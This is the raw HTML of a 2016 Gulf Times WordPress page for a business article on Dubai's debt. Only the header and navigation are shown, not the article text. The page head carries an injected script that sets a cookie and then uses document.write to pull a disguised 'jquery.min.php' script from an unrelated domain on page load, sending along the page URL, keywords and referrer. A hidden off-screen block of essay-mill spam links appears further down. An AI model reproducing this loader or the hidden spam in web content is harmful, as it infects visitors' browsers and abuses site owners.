<!doctype html > <!--[if IE 8]><html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]><html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--><html lang="en" prefix="og: http://ogp.me/ns#"> <!--<![endif]--><head><link type="text/css" media="all" href="http://www.gulftimes.com/wp-content/cache/autoptimize/css/autoptimize_44215a982c9f795c6c6751352b93490b.css" rel="stylesheet" /><title>&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst Gulf Times</title>
<meta name="title" content="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst" />
<meta property="og:url" content="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" />
<meta name="twitter:domain" content="Gulf Times" /><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="http://www.gulftimes.com/xmlrpc.php" /><meta property="og:image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg" /><meta name="author" content="Gulf Times"><link rel="icon" type="image/png" href="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg"> <!-- This site is optimized with the Yoast SEO plugin v3.5 - https://yoast.com/wordpress/plugins/seo/ --><meta name="description" content=" [ad_1]
&lt;br&gt;&lt;div readability=&quot;68&quot;&gt;
&lt;!----&gt;
&lt;p&gt;With Dubai’s debt pile expected to amount to 129 percent of gross domestic product (GDP) this year, the ..." /><meta name="robots" content="noodp"/><meta property="og:locale" content="en_US" /><meta property="og:type" content="article" /><meta property="og:title" content="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst" /><meta property="og:description" content=" [ad_1]
&lt;br&gt;&lt;div readability=&quot;68&quot;&gt;
&lt;!----&gt;
&lt;p&gt;With Dubai’s debt pile expected to amount to 129 percent of gross domestic product (GDP) this year, the ..." /><meta property="og:site_name" content="Gulf Times" /><meta property="article:section" content="UAE - Business" /><meta property="article:published_time" content="2016-09-16T19:22:36+00:00" /><meta property="og:image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg" /><meta property="og:image:width" content="1280" /><meta property="og:image:height" content="685" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content=" [ad_1]
&lt;br&gt;&lt;div readability=&quot;68&quot;&gt;
&lt;!----&gt;
&lt;p&gt;With Dubai’s debt pile expected to amount to 129 percent of gross domestic product (GDP) this year, the ..." /><meta name="twitter:title" content="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst" /><meta name="twitter:image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg" /> <!-- / Yoast SEO plugin. --><link rel="alternate" type="application/rss+xml" title="Gulf Times &raquo; Feed" href="http://www.gulftimes.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Gulf Times &raquo; Comments Feed" href="http://www.gulftimes.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="Gulf Times &raquo; &#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst Comments Feed" href="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/feed/" /> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/www.gulftimes.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.5"}};
			!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;return g&&g.fillText?(g.textBaseline="top",g.font="600 32px Arial","flag"===a?(g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3):"diversity"===a?(g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0]+","+c[1]+","+c[2]+","+c[3],d!==e):("simple"===a?g.fillText(h(55357,56835),0,0):g.fillText(h(55356,57135),0,0),0!==g.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style type="text/css">img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}</style><link rel='stylesheet' id='et-gf-open-sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /><style id='rs-plugin-settings-inline-css' type='text/css'>.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}</style><link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.4.5' type='text/css' media='all' /><link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400&#038;ver=4.4.5' type='text/css' media='all' /><link rel='https://api.w.org/' href='http://www.gulftimes.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.gulftimes.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.gulftimes.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 4.4.5" /><link rel='shortlink' href='http://www.gulftimes.com/?p=28273' /><link rel="alternate" type="application/json+oembed" href="http://www.gulftimes.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F" /><link rel="alternate" type="text/xml+oembed" href="http://www.gulftimes.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;format=xml" /><style type="text/css" id="et-social-custom-css"></style><link rel='canonical' href='http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/' /> <script type="text/javascript" src="http://www.gulftimes.com/wp-content/cache/autoptimize/js/autoptimize_d872f8db2412fb5abae8d56e75459020.js"></script><!--noptimize--><!-- Autoptimize found a problem with the HTML in your Theme, tag "/head" missing --><!--/noptimize--><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.gulftimes.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://www.gulftimes.com/wp-content/plugins/js_composer/assets/css/vc-ie8.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var tdBlocksArray = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function tdBlock() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
    
        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limit_bottom":767,"sidebar_width":228},{"limit_bottom":1018,"sidebar_width":300},{"limit_bottom":1140,"sidebar_width":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/www.gulftimes.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.5.1";
var td_get_template_directory_uri="http:\/\/www.gulftimes.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="show_header_logo";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    

/* Style generated by theme (global compiled style) */

.block-title > span,
    .block-title > a,
    .block-title > label,
    .widgettitle,
    .widgettitle:after,
    .td-trending-now-title,
    .td-trending-now-wrapper:hover .td-trending-now-title,
    .wpb_tabs li.ui-tabs-active a,
    .wpb_tabs li:hover a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,
    .td-related-title .td-cur-simple-item,
    .woocommerce .product .products h2,
    .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more {
        background-color: #222222;
    }

    .woocommerce div.product .woocommerce-tabs ul.tabs li.active {
    	background-color: #222222 !important;
    }

    .block-title,
    .td-related-title,
    .wpb_tabs .wpb_tabs_nav,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,
    .woocommerce div.product .woocommerce-tabs ul.tabs:before {
        border-color: #222222;
    }
</style>

<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://threefingerssawmill.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>


<body class="single single-post postid-28273 single-format-standard et_monarch immense-need-for-close-monitoring-of-dubai-debt-warns-analyst wpb-js-composer js-comp-ver-4.7.4 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">


<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

<div id="td-outer-wrap">

    <div class="td-transition-content-and-menu td-mobile-nav-wrap">
        <div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CLOSE</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-main-menu-container"><ul id="menu-main-menu" class=""><li id="menu-item-19583" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-19583"><a href="http://www.gulftimes.com/politics/">Politics</a></li>
<li id="menu-item-1235" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-1235"><a href="http://www.gulftimes.com/uae-business/">UAE &#8211; Business</a>
<ul class="sub-menu">
	<li id="menu-item-1236" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1236"><a href="http://www.gulftimes.com/uae-business/gcc/">GCC</a></li>
	<li id="menu-item-1237" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1237"><a href="http://www.gulftimes.com/uae-business/middle-east/">Middle East</a></li>
	<li id="menu-item-1238" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1238"><a href="http://www.gulftimes.com/uae-business/oil-market/">Oil Market</a></li>
	<li id="menu-item-1239" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1239"><a href="http://www.gulftimes.com/uae-business/qatar/">Qatar</a></li>
	<li id="menu-item-1240" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1240"><a href="http://www.gulftimes.com/uae-business/stock-market/">Stock Market</a></li>
</ul>
</li>
<li id="menu-item-1241" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1241"><a href="http://www.gulftimes.com/sport/">Sport</a>
<ul class="sub-menu">
	<li id="menu-item-1242" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1242"><a href="http://www.gulftimes.com/sport/basketball/">Basketball</a></li>
	<li id="menu-item-1243" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1243"><a href="http://www.gulftimes.com/sport/football/">Football</a></li>
	<li id="menu-item-1244" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1244"><a href="http://www.gulftimes.com/sport/formula-one/">Formula One</a></li>
	<li id="menu-item-1245" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1245"><a href="http://www.gulftimes.com/sport/golf/">Golf</a></li>
	<li id="menu-item-1246" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1246"><a href="http://www.gulftimes.com/sport/mba/">MBA</a></li>
	<li id="menu-item-1247" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1247"><a href="http://www.gulftimes.com/sport/tennis/">Tennis</a></li>
</ul>
</li>
<li id="menu-item-1248" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1248"><a href="http://www.gulftimes.com/international/">International</a>
<ul class="sub-menu">
	<li id="menu-item-1249" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1249"><a href="http://www.gulftimes.com/international/africa/">Africa</a></li>
	<li id="menu-item-2100" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2100"><a href="http://www.gulftimes.com/international/asia/">Asia</a></li>
	<li id="menu-item-1251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1251"><a href="http://www.gulftimes.com/international/australia/">Australia</a></li>
	<li id="menu-item-1253" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1253"><a href="http://www.gulftimes.com/international/usa/">USA</a></li>
</ul>
</li>
<li id="menu-item-1254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1254"><a href="http://www.gulftimes.com/culture/">Culture</a></li>
<li id="menu-item-1255" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1255"><a href="http://www.gulftimes.com/opinion/">Opinion</a></li>
<li id="menu-item-1256" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1256"><a href="http://www.gulftimes.com/entertainment/">Entertainment</a>
<ul class="sub-menu">
	<li id="menu-item-20871" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20871"><a href="http://www.gulftimes.com/entertainment/games/">Games</a></li>
</ul>
</li>
</ul></div>    </div>
</div>    </div>

        <div class="td-transition-content-and-menu td-content-wrap">



<div style="position:absolute; top:-9999px;">
<ul><li><a href="http://www.gulftimes.com/buy-a-philosophy-paper.html">narrative essay for college students</a></li><li><a href="http://www.gulftimes.com/purchase-argumentative-essays.html">purchase argumentative essays</a></li><li><a href="http://www.gulftimes.com/ghostwriting-service-page.html">buy university essays uk</a></li><li><a href="http://www.gulftimes.com/original-essay-writing-service.html">buy essays on from pencils to pixels subject</a></li><li><a href="http://www.gulftimes.com/essay-writing-services-toronto.html">essay writing services toronto</a></li><li><a href="http://www.gulftimes.com/do-my-assignment.html">do my assignment</a></li><li><a href="http://www.gulftimes.com/architecture-papers-help.html">essay help for cheap</a></li><li><a href="http://www.gulftimes.com/writing-persuasive-essays-high-school.html">writing persuasive essays high school</a></li></ul></div><!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">

    <div class="td_data_time">Friday, September 16, 2016</div>
                <ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Sign in / Join</a><span class="td-sp-ico-login td_sp_login_ico_style"></span></li></ul>
                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <ul class="td-login-tabs">
                        <li><a id="login-link" class="td_login_tab_focus">LOG IN</a></li>
                    </ul>



                    <div class="td-login-wrap">
                        <div class="td_display_err"></div>

                        <div id="td-login-div" class="">
                            <div class="td-login-panel-title">Welcome! Log into your account</div>
                            <input class="td-login-input" type="text" name="login_email" id="login_email" placeholder="your username" value="" required>
                            <input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" placeholder="your password" required>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Log In">


                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password?</a></div>


                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-dispaly-none">
                            <div class="td-login-panel-title">Recover your password</div>
                            <input class="td-login-input" type="text" name="forgot_email" id="forgot_email" placeholder="your email" value="" required>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Pass">
                        </div>




                    </div>
                </div>
                </div>
        <div class="td-header-sp-top-widget">
    <span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/igulftimes" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://twitter.com/gulftimescom" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></div>
    </div>

        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                    <a itemprop="url" href="http://www.gulftimes.com/">
        <img class="td-retina-data" data-retina="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" src="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" alt=""/>
    </a>
    <meta itemprop="name" content="Gulf Times">
            </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    <div class="td-a-rec td-a-rec-id-header "><div class="td-all-devices"><a href="http://www.jobs24.com" target="_blank"><img src="http://www.gulftimes.com/wp-content/uploads/2016/02/jobs24.2.jpg"/></a></div></div>
</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo">
        			<a itemprop="url" class="td-mobile-logo td-sticky-header" href="http://www.gulftimes.com/"><img src="http://viacredit.ro/jobs/wp-content/uploads/2015/11/logo-white.png" alt=""/></a>
			<meta itemprop="name" content="Gulf Times">
				<a itemprop="url" class="td-header-logo td-sticky-header" href="http://www.gulftimes.com/">
			<img class="td-retina-data" data-retina="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" src="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times.jpg" alt=""/>
		</a>
		<meta itemprop="name" content="Gulf Times">
	    </div>
    <div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-normal-menu menu-item-19583"><a href="http://www.gulftimes.com/politics/">Politics</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children td-menu-item td-normal-menu menu-item-1235"><a href="http://www.gulftimes.com/uae-business/">UAE &#8211; Business</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1236"><a href="http://www.gulftimes.com/uae-business/gcc/">GCC</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1237"><a href="http://www.gulftimes.com/uae-business/middle-east/">Middle East</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1238"><a href="http://www.gulftimes.com/uae-business/oil-market/">Oil Market</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1239"><a href="http://www.gulftimes.com/uae-business/qatar/">Qatar</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1240"><a href="http://www.gulftimes.com/uae-business/stock-market/">Stock Market</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1241"><a href="http://www.gulftimes.com/sport/">Sport</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1242"><a href="http://www.gulftimes.com/sport/basketball/">Basketball</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1243"><a href="http://www.gulftimes.com/sport/football/">Football</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1244"><a href="http://www.gulftimes.com/sport/formula-one/">Formula One</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1245"><a href="http://www.gulftimes.com/sport/golf/">Golf</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1246"><a href="http://www.gulftimes.com/sport/mba/">MBA</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1247"><a href="http://www.gulftimes.com/sport/tennis/">Tennis</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1248"><a href="http://www.gulftimes.com/international/">International</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1249"><a href="http://www.gulftimes.com/international/africa/">Africa</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2100"><a href="http://www.gulftimes.com/international/asia/">Asia</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1251"><a href="http://www.gulftimes.com/international/australia/">Australia</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1253"><a href="http://www.gulftimes.com/international/usa/">USA</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1254"><a href="http://www.gulftimes.com/culture/">Culture</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1255"><a href="http://www.gulftimes.com/opinion/">Opinion</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1256"><a href="http://www.gulftimes.com/entertainment/">Entertainment</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-20871"><a href="http://www.gulftimes.com/entertainment/games/">Games</a></li>
</ul>
</li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form role="search" method="get" class="td-search-form" action="http://www.gulftimes.com/">
				<div class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://www.gulftimes.com/"><span itemprop="title">Home</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in UAE - Business" class="entry-crumb" itemprop="url" href="http://www.gulftimes.com/uae-business/"><span itemprop="title">UAE - Business</span></a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst"><meta itemprop="url" content = "http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/">&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-28273" class="post-28273 post type-post status-publish format-standard has-post-thumbnail hentry category-uae-business" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://www.gulftimes.com/uae-business/">UAE - Business</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a itemprop="author" href="http://www.gulftimes.com/author/alexcatalin/">Gulf Times</a> - </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-09-16T19:22:36+00:00" >September 16, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-post-comments"><a href="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-28273">7</span></div>                </div>

            </header>

        </div>

